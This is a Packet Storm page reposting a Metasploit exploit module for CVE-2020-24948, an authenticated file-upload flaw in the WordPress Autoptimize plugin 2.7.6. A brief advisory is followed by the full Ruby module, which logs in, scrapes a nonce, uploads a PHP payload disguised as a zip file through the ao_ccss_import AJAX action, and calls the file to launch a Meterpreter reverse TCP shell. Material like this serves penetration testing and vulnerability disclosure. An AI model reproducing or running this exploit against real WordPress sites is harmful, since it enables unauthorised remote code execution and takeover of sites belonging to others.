exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Autoptimize Shell Upload

WordPress Autoptimize Shell Upload
Posted Jan 8, 2021
Authored by Hoa Nguyen, Thien Ngo, Khanh Nguyen | Site metasploit.com

WordPress Autoptimize plugin suffers from a remote shell upload vulnerability. The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to remote code execution.

tags | exploit, remote, arbitrary, shell, php, code execution
advisories | CVE-2020-24948
SHA-256 | 6976952649b949f1c677f4557fec06bb177e699a8fe16b809dfddb9cd2ec1b25

WordPress Autoptimize Shell Upload

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(
info,
'Name' => 'Wordpress Autoptimize Authenticated File Upload',
'Description' => %q{
The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file,
allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.
},
'Author' =>
[
'Khanh Nguyen - Suncsr Team', # Vulnerability discovery
'Hoa Nguyen - Suncsr Team', # Metasploit module
'Thien Ngo - Suncsr Team' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2020-24948'],
['EDB', '48770'],
['WPVDB', '10372']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'Targets' => [['WP Autoptimize 2.7.6', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => '2020-08-24'))

register_options(
[
OptString.new('USERNAME', [true, 'The WordPress password to authenticate with', nil]),
OptString.new('PASSWORD', [true, 'The WordPress username to authenticate with', nil])
])
end

def check
check_plugin_version_from_readme('autoptimize','2.7.7')
end

def ao_ccss_import_nonce(cookie)
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_backend,'options-general.php'),
'cookie' => cookie,
'vars_get' => {
'page' => 'ao_critcss'
}
},5)

if res.code == 200
print_good("Found ao_ccss_import_nonce_code Value!")
else
fail_with(Failure::Unknown,'Server did not response in an expected way')
end

ao_ccss_import_nonce_code = res.body.match(/'ao_ccss_import_nonce', '(\w+)/).captures[0]
return ao_ccss_import_nonce_code
end

def exploit
username = datastore['USERNAME']
password = datastore['PASSWORD']
print_status("Trying to login as #{username}")
cookie = wordpress_login(datastore['USERNAME'],datastore['PASSWORD'])
if cookie.nil?
print_error("Unable to login as #{username}")
end

vars = ao_ccss_import_nonce(cookie)
print_status("Trying to upload payload")
filename = "#{rand_text_alpha_lower(8)}.php"

data = Rex::MIME::Message.new
data.add_part('ao_ccss_import', nil, nil, 'form-data; name="action"')
data.add_part(vars, nil, nil, 'form-data; name="ao_ccss_import_nonce"')
data.add_part(payload.encoded, 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
post_data = data.to_s
print_status("Uploading payload")

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend,'admin-ajax.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie
})

if res.code == 200
register_files_for_cleanup(filename)
else
fail_with(Failure::Unknown,'Server did not response in an expected way')
end

print_status("Calling uploaded file #{filename}")
send_request_cgi({'uri' => normalize_uri(wordpress_url_wp_content, 'uploads','ao_ccss',filename)},5)
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close